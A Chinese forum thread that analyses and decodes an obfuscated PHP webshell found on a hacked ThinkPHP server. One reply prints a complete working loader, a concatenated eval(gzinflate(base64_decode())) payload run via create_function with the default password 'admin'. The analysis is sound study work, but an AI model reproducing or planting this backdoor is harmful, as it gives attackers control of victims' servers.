分析一个常见的php大马并且解码过程

drawfans

今天在逛群的时候，看到有人说服务器被中了马，截图看了一下，是一个php的大马。
看到用的是tp6框架，应该是被利用了远程执行的漏洞强行中了马。

拿到了这个马我用编辑器打开了一下，果然是一句话，一个经过ROT-13编码的php大马。


看到了利用str_rot13对字符进行解码。那方法就来啦。

简单对文件修改一下。

这个马用到了pack()，意思就是函数把数据装入一个二进制字符串，
然后放入字符以字符的形式写出来。
流程应该没错。我就放到本地测试一下。
启动了php服务。

成功。

格式化一下

完整的代码就来了。

加上原来的文件头部分代码。
运行一下。

检测了md5，这串md5不就是admin吗。。哈哈哈

验证成功。进入了面板了。

感觉传这些马的人都闲的没事情做。

就这么多了。

木马样本我就不上传了，避免不法人拿去使用。。
以上仅供经验分享，高手勿喷，嘴下留情。

2020年8月13号编辑

应要求，留下样本。
php大马.zip (42.76 KB, 下载次数: 597)

2020-8-13 19:00 上传

点击文件名下载附件
木马文件，下载请勿放在服务上运行，避免被不法人员利用。
下载积分: 吾爱币 -1 CB

木马样本文件，请勿上传到服务器上运行。测试请在本地测试。

drawfans

样本已经上传。详情请看帖子页尾。

83835332

大佬分析下这个木马呗

[PHP] 纯文本查看 复制代码

?

1 2 3 4

<?php $password='admin';//登录密码   $html='$password'.'='."'".$password."';".'@e#html'.''.'v'."".''.''."".''.''.''.'a'.''.'l('.'g'.''."".''.''.'z'.'i'.''.''.'n'.'f'.'l'.''.''."".'a'.'t'.'e(b'.'as'.''.''.''."".''.'e'.'6'.''."".''."".""."".''.'4_'.'d'.'e'.'c'.''.''.''."".''."".'o'.'d'.'e'.'('."'lVZdb5tKEH2PlP+wQVEBiTq4jaPeWJGapoTmKsapDU6TNkJ4WQw1ZumyLq3T/Pc7i+0YAzdJ/WKxO3PmzJkP2N0hjFHmMpJSxqNkouhqd3cnI1kW0cTNuMe4Ik6iACl7UZYRruy7Q2M4vOhbX6U0TL00ku5UFd3v7iD47WN0gmS5u3qaZ4R5E5JwcdqjiyiOvYPDlo4UTGepx6NxTLqoN7ww0FFL76LrKPFpniHLRp3WG3WDw2JAGHsZOTp0fYKpT5TtJ+nGCYc90zLGb297ve+Gfjvy3/p6xxl9GYWjxYjfJNPDntE2HHgeT/+dS6paQrdIXgsgXS4+XI3NOPTagwvvi/W5b4Z5zzyfYnPSweZ57tkOw99v45s30/zGDjvedcpvF/FPYlp5/9pi/iycXeYnJ9Iq0jKckDKYJ5gLhcmvKOOZIgcZxVOakkTeaFlwi6NkCsxSj2XEBaKKYLtmXlj8mBP2G0wK068yqBrKd2WDkGZC/4wzTmOaE6asTMWFfLcFFqRg+UhGKXw19E7X0D50SkKX/wClobZe9hRZgfcW+QKRzkVwyTRsdHC/JPuAPtn21UG7pX9j3xKp2+DRApdPEPsY3RccHp60dKDNXp+KPjtGf99lT0Kf0SQhRa2O0VlMMyKsmzyCnEWcCA20wlutIkZJSDyfMFCjXb3DNOHAPhNKVYHzMIoJTF9AaFBIXNN43ShE1G5CoJ8KFof6P0dVFo+l2rA5QXoj4jax1rLBSAPew3MhXr1Cyoof5AfSoT9/UOlAqNmcVVU4/fnwlccAi6IVutVEF0OzTrB0uUJ42IzrHjR8SkFWrK23hSqyqo0xhks3SiIuP3FPfhFcHXMcAplHb6XMtTiFxUtT2L041NCZM7jsX9ku/C3pvMjavugZfceGue28yH5g2M7Asgen1vDcGGjIHjjGy2gNjcGpaVi2Vtr/W0sGr3MVSgjnGu6qaJsbKMbz5QDpXGh/RfZi2HNiW7pB007lZJaKUXsfwGTVFmoRASz4b2VpWW/NIoP30SyNxXtClrUVplrvoibOkk/ijxE7TfxzIFBp/aZIgqfIzF13a410vWebNNqDcQu8OCP/E7GIBo7ieyD28FIb8ATKEsDgUsRSvIYPAoCZLKIkiD1efVEDioApCip4vuCjgvz04kaLJc5/')));";$css=base64_decode("Q3JlYXRlX0Z1bmN0aW9u");$style=$css('',preg_replace("/#html/","",$html));$style();/*));.'<linkrel="stylesheet"href="$#css"/>';*/

drawfans

liudazhi 发表于 2020-8-15 11:17
据我所知，应该是只有TP5.0.X-5.0.23    TP5.1.X-5.1.31   这个版本的TP5有远程代码执行。而TP6的话，就好 ...

确实是远程执行，应该第三方程序开发开发过程中权限控制不妥导致的，可能非TP6本身的问题。因为我没有看到他们的log日志，暂时无法知道究竟是从哪里写入的马

sky995

优秀 主要是编码解码值得学习

AlexAux

思路学到了

不懂就问小小白

感谢楼主的分享！

孤狼微博

昨天下午的马马上就解密了，你是大神

kk52140

厉害厉害

涛之雨

eval类型的加密，解密起来还是很容易的。。。
输出大法好

tangyi606

感觉好好玩的样子！怎么就一串乱乱的东西编程了代码了

msslsk

原来是长这样